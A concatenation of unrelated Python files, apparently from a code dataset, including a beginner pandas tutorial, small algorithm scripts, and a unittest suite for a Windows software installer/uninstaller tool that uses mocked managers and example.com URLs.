Raised when trying to deserialize a value from a stream, but the stream
is incomplete or corrupted.
"""
def __init__(self, popped_bytes: Optional[Union[bytes, bytearray]] = None):
self.popped_bytes = popped_bytes or bytes()
|
import numpy as np
import pandas as pd
#creating a series from list
mylist=['m','h','n']
print(pd.Series(data=mylist))
print('\n')
#changing or assigning labels
labels =['bad', 'good', 'unknown']
print(pd.Series(data=mylist,index=labels))
print('\n')
#creating a series from np array
array=np.array([2,4,6])
print(pd.Series(array))
print('\n')
#from dictionary
Dict={'love':'spiritual','business':'creative'}
print(pd.Series(Dict)) #indexes are as same as dictionary's indexes
print('\n')
#####################
#operations on index
se1=pd.Series([1,2,3,4],index=['USA','UK','Russia','NK'])
se2=pd.Series([4,0,2,1],index=['USA','Myanmar','Russia','SK'])
print(se1,'\n',se2,'\n')
print(se1+se2) #values under the same labels can be added #opposite shows 'NaN'
print(se1['NK']) #indexing is like list
#####################
#building a data frame
np.random.seed(101) #define a seed(some_number) so that whenever some_number is called from seed, the same output will be achieved
df=pd.DataFrame(np.random.randn(4,5),index='a b c d'.split(),columns=['v','w','x','y','z'])
print(df)
#selecting columns
print(df[['x','y']]) #pass one parameter only #double brackets when a list pass in
print(type(df['w'])) #type should be series.Series under DataFrame
df['total']=df['v']+df['w']+df['x']+df['y']+df['z']
print(df,'\n')
#selecting rows
print(df.loc['a'])
print(df.iloc[0]) #by index
print('\n')
#selecting element
print('a,y has',df.loc['a','y'])
print('\n')
print(df.drop('d',axis=0)) #hide any column or row but not permanent
df.drop('total',axis=1,inplace=True)#delete row or column permanently
print(df)
####################
#conditions
print(df>0) #return booleans
print(df[df>0]) #return with numbers
print('\n\nonly rows allowed for y>0')
print(df[df['y']>0]) #returns 'y' column's non-zeros rows , define this as the whole row number
print(df[df['y']>0][['x','z']]) #in original Frame, y column has rows=2 when y>0, the frame rows=2 and now is choosing row=2,column under 'x' and 'z'
print( df[ (df['v']>1) & (df['w']<0) ] ) #rows under 'v' that has element value>1 and rows under 'w' that has element value <0
#return empty since the two conditions doesn't match in any condition
print('\n\n')
#reset index
print(df.reset_index())
#set or changes index
df['countries']=['US','UK','Ukarine','Urine'] #insert a new column
df.set_index('countries',inplace=True) #without inplace is temporary change
print(df,'\n')
#####################
#index hierarchy
outside ='A A B B'.split()
inside ='1 2 1 2'.split()
hier_index = list(zip(outside,inside)) #match two lists
print(hier_index)
hier_index = pd.MultiIndex.from_tuples(hier_index) #make it index
print(hier_index)
df.set_index(hier_index,inplace=True)
print(df,'\n')
###################
#name the index
print('named')
df.index.names= ['Class','room']
print(df,'\n')
##################
#indexing
print(df.loc['A'].loc['1'] , '\n') #values of A,1
print(df.xs('A')) #values of A,all
print(df.xs(['A','1'])) #another way of values of A,1
#search 'this' under name >> level='this_name'
print(df.xs('1',level='room')) #values of all,1
##################
#dealing with missing datas
df = df[df>0]
print(df)
print(df.isnull()) # check null values, opposite to print(df>0)
print(df.fillna(axis=1,value='FUCK')) #replace NaN values
print(df.dropna(axis=1)) #drop NaN values
print(df.dropna(axis=0,thresh=4)) #drop NaN values for no of non-Nans = thresh
print('\n')
dfw = df['w'].fillna(value=df['w'].mean())
print('w nan is filled with mean\n',dfw)
print('\n')
##################
#grouping
data = {
'Company':['GOOG','GOOG','MSFT','MSFT','FB','FB'],
'Person':['Sam','Charlie','Amy','Vanessa','Carl','Sarah'],
'Sales':[200,120,340,124,243,350]
}
df=pd.DataFrame(data)
print(df)
comp_gp = df.groupby("Company")
print(comp_gp.describe().transpose())
#mean()
#min()
#max()
#std()
#count() - returns the repeatation, count of the same unit
#extracting a variable
fb = comp_gp.describe().transpose()['FB']
print(fb)
print('\n')
#################
#dataFrames merge, join, concatenation
#concatenation
df1= pd.DataFrame(
{
'A':'A0 A1 A2'.split(),
'B':'B0 B1 B2'.split(),
'C':'C0 C1 C2'.split()
},index=[0,1,2])
df2= pd.DataFrame(
{
'A':'A3 A4 A5'.split(),
'B':'B3 B4 B5'.split(),
'C':'C3 C4 C5'.split()
}, index=[3,4,5])
df3= pd.DataFrame(
{
'A':'A6 A7 A8'.split(),
'B':'B6 B7 B8'.split(),
'C':'C6 C7 C8'.split()
},index=[6,7,8])
df = pd.concat([df1,df2,df3],axis=1) #axis 0 concate rows when 1 concates columns, index matters
print(df)
#merging
df1= pd.DataFrame(
{
'A':'A0 A1 A2'.split(),
'B':'B0 B1 B2'.split(),
'C':'C0 C1 C2'.split()
},index=[0,1,2])
df2= pd.DataFrame(
{
'C':'C0 C1 C2'.split(),
'D':'D0 D1 D2'.split(),
'E':'E0 E1 E2'.split()
}, index=[0,1,2])
#to be merged, there has to be common
df = pd.merge(df1,df2,how='inner',on='C')
print(df)
#merge(df1,df2,on=['key1','key2'])
#merge(df1,df2,how='outer',on=['key1','key2'])
#merge(df1,df2,how='right',on=['key1','key2'])
#merge(df1,df2,how='left',on=['key1','key2'])
#more complicated methods of merging
left = pd.DataFrame(
{
'A': ['A0', 'A1', 'A2'],
'B': ['B0', 'B1', 'B2']
},index=['K0', 'K1', 'K2'])
right = pd.DataFrame(
{
'C': ['C0', 'C2', 'C3'],
'D': ['D0', 'D2', 'D3']
},index=['K0', 'K2', 'K3'])
print(left.join(right)) #how=inner gives no nan rows #outer gives all nans rows
#no how parameter gives no nan rows in left, right rows are adjusted to left
print('\n')
###################
#operations
df = pd.DataFrame({'col1':[1,2,3,4],'col2':[444,555,666,444],'col3':['abc','def','ghi','xyz']})
print(df.head()) #get the first n rows (no of rows)
print('unique af',df['col2'].unique()) #return the unique elements of array
print('index',df['col2'].nunique()) #return the indexes of unique elements of array
print('counts are-\n',df['col2'].value_counts()) #return the repeatations of numbers
#indexing or selecting
print ( df[(df['col1']>2) & (df['col2']==444)] )
#########################
#applying function
#.apply(func)
def times2(x):
return x*2
df['col1*2'] = df['col1'].apply(times2)
print(df)
print('col3 has strings their lengths are-')
print(df['col3'].apply(len))
#.sum() adds every thing under column
#########################
#deleting column value
print('we don\'t need them we delete')
del df['col3']
print(df)
#########################
#Getting index and column
#df.index - for index
#df.columns- for column
#########################
#Sorting
df.sort_values(by='col2',ascending=True,inplace=True) #False for descending
print('sorted df')
print(df,'\n')
#########################
#pivot_table or reshaping
data = {'A':['foo','foo','foo','bar','bar','bar'],
'B':['one','one','two','two','one','one'],
'C':['x','y','x','y','x','y'],
'D':[1,3,2,5,4,1]}
df = pd.DataFrame(data)
print(df)
print('\nchanged\n')
df = df.pivot_table(values='D',index=['A','B'],columns=['C'])
print(df)
#######################
#data read, inputs, outputs
# df = pd.read_csv('file.csv') #read csv file
# df.to_csv('example1',index=False) #write csv file
# df = pd.read_excel('file.xlsx',sheetname='Sheet1') #read excel file
# df.to_excel('Excel_Sample.xlsx',sheet_name='Sheet1') #write excel file
#read html datas
# df = pd.read_html('http://www.fdic.gov/bank/individual/failed/banklist.html')
|
def m_func(n_1, n_2, n_3):
m_list = [n_1, n_2, n_3]
try:
m_list.remove(min(m_list))
return sum(m_list)
except TypeError:
return 'Error'
print(m_func(n_1=15, n_2=5, n_3=10))
|
n = int(input())
t = list(map(int, input().split()))
m = int(input())
P, X = [], []
for i in range(m):
p, x = map(int, input().split())
P.append(p)
X.append(x)
s = 0
dic = {}
for i in range(n):
s += t[i]
dic[i] = t[i]
for i in range(m):
k = dic[P[i]-1]
print(s-k+X[i])
|
#
# SPDX-License-Identifier: Apache-2.0
#
# Copyright 2020 Andrey Pleshakov
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from dataclasses import replace
from pathlib import Path
from unittest import TestCase
from unittest.mock import call, NonCallableMock
from thespiae.conf import AppData, AppEntry
from thespiae.conf.core import get_app_config_from
from thespiae.install.exception import InvalidOrMissingAppDataError, InterruptedFileOperationsError, \
UnknownInstallTypeError, UnknownUninstallTypeError
from thespiae.install.protocol import Feedback
from .helper import set_install_manager_data, InstallManagerMockResetMixin, DownloadManagerMockResetMixin, \
ExtraAssertMixin, set_download_manager_data
from .singleton import exe_install_handler, msi_install_handler, command_install_handler, install_manager, \
software_processor, download_manager, exe_uninstall_handler, msi_uninstall_handler, command_uninstall_handler, \
file_install_handler, file_uninstall_handler, archive_install_handler, archive_uninstall_handler
from ..conf.helper import load_yaml_from_test_dir
_exe_entry1 = AppEntry(name='test', installer_url='http://example.com/123.exe', file_hash='4567', version='890',
uninstaller_path='123.exe', install_args=['a'], uninstall_args=['b'])
class ExeInstallHandlerTest(InstallManagerMockResetMixin, TestCase):
def test_applicability(self):
self.assertTrue(exe_install_handler.is_applicable(_exe_entry1))
def test_applicability2(self):
self.assertFalse(exe_install_handler.is_applicable(replace(_exe_entry1, installer_url=None)))
def test_creating_download_spec(self):
spec = exe_install_handler.create_download_spec(_exe_entry1, 'C:\\')
self.assertEqual(spec.url, 'http://example.com/123.exe')
self.assertEqual(spec.download_path, 'C:\\test\\890\\test_890.exe')
self.assertEqual(spec.hash, '4567')
self.assertEqual(spec.name, 'test')
self.assertEqual(spec.version, '890')
def test_creating_download_spec2(self):
e = replace(_exe_entry1, name='')
with self.assertRaises(InvalidOrMissingAppDataError) as c:
exe_install_handler.create_download_spec(e, 'C:\\')
self.assertEqual(c.exception.app_entry, e)
self.assertEqual(c.exception.key, 'name')
self.assertEqual(c.exception.value, '')
def test_creating_download_spec3(self):
spec = exe_install_handler.create_download_spec(replace(_exe_entry1, version=None), 'C:\\')
self.assertEqual(spec.url, 'http://example.com/123.exe')
self.assertEqual(spec.download_path, 'C:\\test\\test.exe')
self.assertEqual(spec.hash, '4567')
self.assertEqual(spec.name, 'test')
def test_creating_download_spec4(self):
spec = exe_install_handler.create_download_spec(replace(_exe_entry1, architecture='x86_64'), 'C:\\')
self.assertEqual(spec.url, 'http://example.com/123.exe')
self.assertEqual(spec.download_path, 'C:\\test\\890\\x86_64\\test_890_x86_64.exe')
self.assertEqual(spec.hash, '4567')
self.assertEqual(spec.name, 'test')
self.assertEqual(spec.version, '890')
self.assertEqual(spec.architecture, 'x86_64')
def test_installing(self):
ds = exe_install_handler.create_download_spec(_exe_entry1, 'C:\\')
exe_install_handler.install(_exe_entry1, ds)
install_manager.run_file.assert_called_once_with('C:\\test\\890\\test_890.exe', ['a'])
class ExeUninstallHandlerTest(InstallManagerMockResetMixin, TestCase):
def test_applicability(self):
self.assertTrue(exe_uninstall_handler.is_applicable(_exe_entry1))
def test_applicability2(self):
self.assertFalse(exe_uninstall_handler.is_applicable(replace(_exe_entry1, uninstaller_path=None)))
def test_is_installed_checking(self):
set_install_manager_data(True, None, None)
self.assertTrue(exe_uninstall_handler.is_installed(_exe_entry1))
install_manager.is_file_present.assert_called_once_with('123.exe')
def test_uninstalling(self):
exe_uninstall_handler.uninstall(_exe_entry1)
install_manager.run_file.assert_called_once_with('123.exe', ['b'])
_msi_entry1 = AppEntry(name='test', version='890', package_url='http://example.com/123.msi', product_code='123',
file_hash='4567', install_args=['a'], uninstall_args=['b'])
class MSIInstallHandlerTest(InstallManagerMockResetMixin, TestCase):
def test_applicability(self):
self.assertTrue(msi_install_handler.is_applicable(_msi_entry1))
def test_applicability2(self):
self.assertFalse(msi_install_handler.is_applicable(replace(_msi_entry1, package_url=None)))
def test_creating_download_spec(self):
spec = msi_install_handler.create_download_spec(_msi_entry1, 'C:\\')
self.assertEqual(spec.url, 'http://example.com/123.msi')
self.assertEqual(spec.download_path, 'C:\\test\\890\\test_890.msi')
self.assertEqual(spec.hash, '4567')
self.assertEqual(spec.name, 'test')
self.assertEqual(spec.version, '890')
def test_creating_download_spec2(self):
e = replace(_msi_entry1, name='')
with self.assertRaises(InvalidOrMissingAppDataError) as c:
msi_install_handler.create_download_spec(e, 'C:\\')
self.assertEqual(c.exception.app_entry, e)
self.assertEqual(c.exception.key, 'name')
self.assertEqual(c.exception.value, '')
def test_creating_download_spec3(self):
spec = msi_install_handler.create_download_spec(replace(_msi_entry1, version=None), 'C:\\')
self.assertEqual(spec.url, 'http://example.com/123.msi')
self.assertEqual(spec.download_path, 'C:\\test\\test.msi')
self.assertEqual(spec.hash, '4567')
self.assertEqual(spec.name, 'test')
def test_creating_download_spec4(self):
spec = msi_install_handler.create_download_spec(replace(_msi_entry1, architecture='x86_64'), 'C:\\')
self.assertEqual(spec.url, 'http://example.com/123.msi')
self.assertEqual(spec.download_path, 'C:\\test\\890\\x86_64\\test_890_x86_64.msi')
self.assertEqual(spec.hash, '4567')
self.assertEqual(spec.name, 'test')
self.assertEqual(spec.version, '890')
self.assertEqual(spec.architecture, 'x86_64')
def test_installing(self):
msi_install_handler.install(_msi_entry1, msi_install_handler.create_download_spec(_msi_entry1, 'C:\\'))
install_manager.install_msi.assert_called_once_with('C:\\test\\890\\test_890.msi', ['a'])
class MSIUninstallHandlerTest(InstallManagerMockResetMixin, TestCase):
def test_applicability(self):
self.assertTrue(msi_uninstall_handler.is_applicable(_msi_entry1))
def test_applicability2(self):
self.assertFalse(msi_uninstall_handler.is_applicable(replace(_msi_entry1, product_code=None)))
def test_is_installed_checking(self):
set_install_manager_data(None, True, None)
self.assertTrue(msi_uninstall_handler.is_installed(_msi_entry1))
install_manager.is_product_code_present.assert_called_once_with('123')
def test_uninstalling(self):
msi_uninstall_handler.uninstall(_msi_entry1)
install_manager.uninstall_msi.assert_called_once_with('123', ['b'])
_command_entry1 = AppEntry(name='test', version='456', command='testc', install_args=['a'], list_args=['b'],
installed_list_entry='123:456', uninstall_args=['c'])
class CommandInstallHandlerTest(InstallManagerMockResetMixin, TestCase):
def test_applicability(self):
self.assertTrue(command_install_handler.is_applicable(_command_entry1))
def test_applicability2(self):
self.assertFalse(command_install_handler.is_applicable(replace(_msi_entry1, command=None)))
def test_creating_download_spec(self):
self.assertIsNone(command_install_handler.create_download_spec(_msi_entry1, 'C:\\'))
def test_installing(self):
command_install_handler.install(_command_entry1, None)
install_manager.run_command.assert_called_once_with('testc', ['a'])
class CommandUninstallHandlerTest(InstallManagerMockResetMixin, TestCase):
def test_applicability(self):
self.assertTrue(command_uninstall_handler.is_applicable(_command_entry1))
def test_applicability2(self):
self.assertFalse(command_uninstall_handler.is_applicable(replace(_command_entry1, list_args=None)))
def test_applicability3(self):
self.assertFalse(command_uninstall_handler.is_applicable(replace(_command_entry1, installed_list_entry=None)))
def test_is_installed_checking(self):
set_install_manager_data(None, None, 'a:b\r\n123:456\r\nc:d\r\n')
self.assertTrue(command_uninstall_handler.is_installed(_command_entry1))
install_manager.run_command.assert_called_once_with('testc', ['b'])
def test_uninstalling(self):
command_uninstall_handler.uninstall(_command_entry1)
install_manager.run_command.assert_called_once_with('testc', ['c'])
_file_entry1 = AppEntry(name='123', version='456', file_url='http://example.com/1.txt',
file_directory=r'C:\test\test2', file_name='test.txt', file_hash='789')
class FileInstallTestCase(InstallManagerMockResetMixin, TestCase):
def test_applicability(self):
self.assertTrue(file_install_handler.is_applicable(_file_entry1))
def test_applicability2(self):
self.assertFalse(file_install_handler.is_applicable(replace(_file_entry1, file_url=None)))
def test_applicability3(self):
self.assertFalse(file_install_handler.is_applicable(replace(_file_entry1, file_directory=None)))
def test_applicability4(self):
self.assertFalse(file_install_handler.is_applicable(replace(_file_entry1, file_name=None)))
def test_creating_download_spec(self):
spec = file_install_handler.create_download_spec(_file_entry1, 'C:\\')
self.assertEqual(spec.url, 'http://example.com/1.txt')
self.assertEqual(spec.download_path, 'C:\\123\\456\\123_456.txt')
self.assertEqual(spec.part_path, 'C:\\123\\456\\123_456.txt.part')
self.assertEqual(spec.hash, '789')
self.assertEqual(spec.name, '123')
self.assertEqual(spec.version, '456')
def test_creating_download_spec2(self):
spec = file_install_handler.create_download_spec(replace(_file_entry1, version=None), 'C:\\')
self.assertEqual(spec.url, 'http://example.com/1.txt')
self.assertEqual(spec.download_path, 'C:\\123\\123.txt')
self.assertEqual(spec.part_path, 'C:\\123\\123.txt.part')
self.assertEqual(spec.hash, '789')
self.assertEqual(spec.name, '123')
def test_creating_download_spec3(self):
spec = file_install_handler.create_download_spec(replace(_file_entry1, architecture='x86_64'), 'C:\\')
self.assertEqual(spec.url, 'http://example.com/1.txt')
self.assertEqual(spec.download_path, 'C:\\123\\456\\x86_64\\123_456_x86_64.txt')
self.assertEqual(spec.part_path, 'C:\\123\\456\\x86_64\\123_456_x86_64.txt.part')
self.assertEqual(spec.hash, '789')
self.assertEqual(spec.name, '123')
self.assertEqual(spec.version, '456')
def test_installing(self):
file_install_handler.install(_file_entry1, file_install_handler.create_download_spec(_file_entry1, 'C:\\'))
install_manager.copy_file.assert_called_once_with('C:\\123\\456\\123_456.txt', Path('C:/test/test2'),
'test.txt')
def test_installing2(self):
e = replace(_file_entry1, file_directory=[])
with self.assertRaises(InvalidOrMissingAppDataError) as c:
file_install_handler.install(e, file_install_handler.create_download_spec(e, 'C:\\'))
self.assertEqual(c.exception.app_entry, e)
self.assertEqual(c.exception.key, 'file_directory')
self.assertEqual(c.exception.value, [])
def test_installing4(self):
install_manager.copy_file.side_effect = OSError
with self.assertRaises(InterruptedFileOperationsError) as c:
file_install_handler.install(_file_entry1, file_install_handler.create_download_spec(_file_entry1, 'C:\\'))
self.assertEqual(c.exception.app_entry, _file_entry1)
self.assertEqual(c.exception.root_directory, r'C:\test\test2')
class FileUninstallTestCase(InstallManagerMockResetMixin, TestCase):
def test_applicability(self):
self.assertTrue(file_uninstall_handler.is_applicable(_file_entry1))
def test_applicability2(self):
self.assertFalse(file_uninstall_handler.is_applicable(replace(_file_entry1, file_directory=None)))
def test_applicability3(self):
self.assertFalse(file_uninstall_handler.is_applicable(replace(_file_entry1, file_name=None)))
def test_is_installed(self):
file_uninstall_handler.is_installed(_file_entry1)
install_manager.is_file_present.assert_called_once_with('C:\\test\\test2\\test.txt')
def test_uninstalling(self):
file_uninstall_handler.uninstall(_file_entry1)
install_manager.remove_file.assert_called_once_with(Path('C:/test/test2'), 'test.txt')
def test_uninstalling2(self):
e = replace(_file_entry1, file_directory=[])
with self.assertRaises(InvalidOrMissingAppDataError) as c:
file_uninstall_handler.uninstall(e)
self.assertEqual(c.exception.app_entry, e)
self.assertEqual(c.exception.key, 'file_directory')
self.assertEqual(c.exception.value, [])
def test_uninstalling4(self):
install_manager.remove_file.side_effect = OSError
with self.assertRaises(InterruptedFileOperationsError) as c:
file_uninstall_handler.uninstall(_file_entry1)
self.assertEqual(c.exception.app_entry, _file_entry1)
self.assertEqual(c.exception.root_directory, r'C:\test\test2')
_archive_entry1 = AppEntry(name='123', version='456', archive_url='http://example.com/1.file',
unpack_directory=r'C:\test\test2', archive_format='zip', file_hash='789')
class ArchiveInstallHandlerTestCase(TestCase):
def test_applicability(self):
self.assertTrue(archive_install_handler.is_applicable(_archive_entry1))
def test_applicability2(self):
self.assertFalse(archive_install_handler.is_applicable(replace(_archive_entry1, archive_url=None)))
def test_applicability3(self):
self.assertFalse(archive_install_handler.is_applicable(replace(_archive_entry1, archive_url=None)))
def test_applicability4(self):
self.assertFalse(archive_install_handler.is_applicable(replace(_archive_entry1, archive_format=None)))
def test_creating_download_spec(self):
spec = archive_install_handler.create_download_spec(_archive_entry1, 'C:\\')
self.assertEqual(spec.url, 'http://example.com/1.file')
self.assertEqual(spec.download_path, 'C:\\123\\456\\123_456.zip')
self.assertEqual(spec.part_path, 'C:\\123\\456\\123_456.zip.part')
self.assertEqual(spec.hash, '789')
self.assertEqual(spec.name, '123')
self.assertEqual(spec.version, '456')
def test_creating_download_spec2(self):
spec = archive_install_handler.create_download_spec(replace(_archive_entry1, version=None), 'C:\\')
self.assertEqual(spec.url, 'http://example.com/1.file')
self.assertEqual(spec.download_path, 'C:\\123\\123.zip')
self.assertEqual(spec.part_path, 'C:\\123\\123.zip.part')
self.assertEqual(spec.hash, '789')
self.assertEqual(spec.name, '123')
def test_creating_download_spec3(self):
spec = archive_install_handler.create_download_spec(replace(_archive_entry1, architecture='x86_64'), 'C:\\')
self.assertEqual(spec.url, 'http://example.com/1.file')
self.assertEqual(spec.download_path, 'C:\\123\\456\\x86_64\\123_456_x86_64.zip')
self.assertEqual(spec.part_path, 'C:\\123\\456\\x86_64\\123_456_x86_64.zip.part')
self.assertEqual(spec.hash, '789')
self.assertEqual(spec.name, '123')
self.assertEqual(spec.version, '456')
def test_installing(self):
archive_install_handler.install(_archive_entry1, archive_install_handler.create_download_spec(_archive_entry1,
'C:\\'))
install_manager.unpack_archive.assert_called_once_with(r'C:\123\456\123_456.zip', 'zip',
Path('C:/test/test2'))
def test_installing2(self):
e = replace(_archive_entry1, unpack_directory=None)
with self.assertRaises(InvalidOrMissingAppDataError) as c:
archive_install_handler.install(e, archive_install_handler.create_download_spec(e, 'C:\\'))
self.assertEqual(c.exception.app_entry, e)
self.assertEqual(c.exception.key, 'unpack_directory')
self.assertEqual(c.exception.value, None)
def test_installing4(self):
install_manager.unpack_archive.side_effect = OSError
with self.assertRaises(InterruptedFileOperationsError) as c:
archive_install_handler.install(_archive_entry1,
archive_install_handler.create_download_spec(_archive_entry1, 'C:\\'))
self.assertEqual(c.exception.app_entry, _archive_entry1)
self.assertEqual(c.exception.root_directory, r'C:\test\test2')
class ArchiveUninstallTestCase(InstallManagerMockResetMixin, TestCase):
def test_applicability(self):
self.assertTrue(archive_uninstall_handler.is_applicable(_archive_entry1))
def test_applicability2(self):
self.assertFalse(archive_uninstall_handler.is_applicable(replace(_archive_entry1, unpack_directory=None)))
def test_applicability3(self):
self.assertTrue(archive_uninstall_handler.is_applicable(replace(_archive_entry1, archive_format=None)))
def test_is_installed(self):
archive_uninstall_handler.is_installed(_archive_entry1)
install_manager.is_file_present.assert_called_once_with(r'C:\test\test2')
def test_uninstalling(self):
archive_uninstall_handler.uninstall(_archive_entry1)
install_manager.remove_directory.assert_called_once_with(Path('C:/test/test2'))
def test_uninstalling2(self):
e = replace(_archive_entry1, unpack_directory=None)
with self.assertRaises(InvalidOrMissingAppDataError) as c:
archive_uninstall_handler.uninstall(e)
self.assertEqual(c.exception.app_entry, e)
self.assertEqual(c.exception.key, 'unpack_directory')
self.assertEqual(c.exception.value, None)
def test_uninstalling4(self):
install_manager.remove_directory.side_effect = OSError
with self.assertRaises(InterruptedFileOperationsError) as c:
archive_uninstall_handler.uninstall(_archive_entry1)
self.assertEqual(c.exception.app_entry, _archive_entry1)
self.assertEqual(c.exception.root_directory, r'C:\test\test2')
class SoftwareProcessorTestCase(InstallManagerMockResetMixin, DownloadManagerMockResetMixin, ExtraAssertMixin,
TestCase):
def test_processing(self):
fb = NonCallableMock(spec_set=Feedback)
set_install_manager_data(False, False, '')
set_download_manager_data({'C:\\temp\\example2\\0.1b\\example2_0.1b.msi'})
data = get_app_config_from(load_yaml_from_test_dir('app_list'))
software_processor.process('C:\\temp', data, fb)
specs = [exe_install_handler.create_download_spec(data.to_install[0], 'C:\\temp'),
msi_install_handler.create_download_spec(data.to_install[1], 'C:\\temp'),
file_install_handler.create_download_spec(data.to_install[3], 'C:\\temp'),
archive_install_handler.create_download_spec(data.to_install[4], 'C:\\temp')]
download_manager.filter_present.assert_called_once_with(specs)
download_manager.download.assert_called_once_with(specs[:1] + specs[2:], fb)
fb.report_checking_software.assert_called_once()
install_manager.uninstall_msi.assert_not_called()
install_manager.copy_file.assert_called_once_with('C:\\temp\\example4\\x86_64\\example4_x86_64.exe',
Path('C:/temp/example4'), 'example4.exe')
install_manager.unpack_archive.assert_called_once_with(r'C:\temp\example5\0.6\x86_64\example5_0.6_x86_64.zip',
'zip', Path('C:/temp/example5/0.6'))
self.assert_called_exactly_with_no_order(install_manager.run_file,
call('C:\\temp\\example1\\1.1\\example1_1.1.exe',
['/SILENT', '/DIR=C:\\Program Files\\Example1\\1.1']))
self.assert_called_exactly_with_no_order(install_manager.run_command,
call('manager', ['list']), call('manager', ['list']),
call('manager', ['install', 'example3:1.1']))
self.assert_called_exactly_with_no_order(install_manager.install_msi,
call('C:\\temp\\example2\\0.1b\\example2_0.1b.msi',
['/q', 'INSTALLDIR=C:\\Program Files\\Example2']))
fb.confirm_operations.assert_called_once_with(specs[:1] + specs[2:], [], list(data.to_install))
fb.report_removal_started.assert_not_called()
fb.report_removal_finished.assert_not_called()
fb.report_installation_started.assert_called_once()
fb.report_installation_finished.assert_called_once()
self.assert_called_exactly_with_no_order(fb.report_entry_installation_started,
*(call(item) for item in data.to_install))
self.assert_called_exactly_with_no_order(fb.report_entry_installation_finished,
*(call(item) for item in data.to_install))
fb.report_entry_removal_started.assert_not_called()
fb.report_entry_removal_finished.assert_not_called()
def test_processing2(self):
fb = NonCallableMock(spec_set=Feedback)
set_install_manager_data(True, True, 'example3_final:1.0\r\nexample3:1.1')
set_download_manager_data(set())
data = get_app_config_from(load_yaml_from_test_dir('app_list'))
software_processor.process('C:\\temp', data, fb)
fb.report_checking_software.assert_called_once()
download_manager.filter_present.assert_called_once_with([])
download_manager.download.assert_not_called()
install_manager.install_msi.assert_not_called()
install_manager.remove_file.assert_called_once_with(Path('C:/temp/example4'), 'example4.exe')
install_manager.remove_directory.assert_called_once_with(Path('C:/temp/example5/0.5'))
self.assert_called_exactly_with_no_order(install_manager.run_file,
call('C:\\Program Files\\Example1\\1.0\\uninstall.exe', None))
self.assert_called_exactly_with_no_order(install_manager.run_command,
call('manager', ['list']), call('manager', ['list']),
call('manager', ['uninstall', 'example3_final:1.0']))
self.assert_called_exactly_with_no_order(install_manager.uninstall_msi, call('pc1235', ['/q']))
fb.confirm_operations.assert_called_once_with([], list(data.to_uninstall), [])
fb.report_installation_started.assert_not_called()
fb.report_installation_finished.assert_not_called()
fb.report_removal_started.assert_called_once()
fb.report_removal_finished.assert_called_once()
self.assert_called_exactly_with_no_order(fb.report_entry_removal_started,
*(call(item) for item in data.to_uninstall))
self.assert_called_exactly_with_no_order(fb.report_entry_removal_finished,
*(call(item) for item in data.to_uninstall))
fb.report_entry_installation_started.assert_not_called()
fb.report_entry_installation_finished.assert_not_called()
def test_processing3(self):
fb = NonCallableMock(spec_set=Feedback)
set_download_manager_data(set())
data = AppData([])
software_processor.process('C:\\temp', data, fb)
fb.report_checking_software.assert_called_once()
download_manager.download.assert_not_called()
install_manager.install_msi.assert_not_called()
install_manager.run_file.assert_not_called()
install_manager.run_command.assert_not_called()
install_manager.uninstall_msi.assert_not_called()
install_manager.unpack_archive.assert_not_called()
install_manager.remove_directory.assert_not_called()
install_manager.copy_file.assert_not_called()
install_manager.remove_file.assert_not_called()
fb.confirm_operations.assert_not_called()
fb.report_installation_started.assert_not_called()
fb.report_installation_finished.assert_not_called()
fb.report_removal_started.assert_not_called()
fb.report_removal_finished.assert_not_called()
fb.report_entry_removal_started.assert_not_called()
fb.report_entry_removal_finished.assert_not_called()
fb.report_entry_installation_started.assert_not_called()
fb.report_entry_installation_finished.assert_not_called()
fb.report_software_set_no_changes.assert_called_once()
def test_processing4(self):
fb = NonCallableMock(spec_set=Feedback)
set_download_manager_data(set())
data = AppData([AppEntry(name='test', installer_url='http://example.com/file.exe')])
with self.assertRaises(UnknownUninstallTypeError) as c:
software_processor.process('C:\\temp', data, fb)
self.assertEqual(c.exception.app_entry, data.to_uninstall[0])
def test_processing5(self):
fb = NonCallableMock(spec_set=Feedback)
set_download_manager_data(set())
data = AppData([AppEntry(name='test', uninstaller_path='C:\\uninst.exe', keep=True)])
with self.assertRaises(UnknownInstallTypeError) as c:
software_processor.process('C:\\temp', data, fb)
self.assertEqual(c.exception.app_entry, data.to_install[0])
|
def maxReach(arr):
maxReachPos = 0
for i, num in enumerate(arr):
if maxReachPos < i:
return False
maxReachPos = max(maxReachPos, num+i)
if maxReachPos >= len(arr):
return True
return False
arr = [1, 0, 8, 8, 4, 2, 0, 0, 2, 1, 0]
res = maxReach(arr)
print(res)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.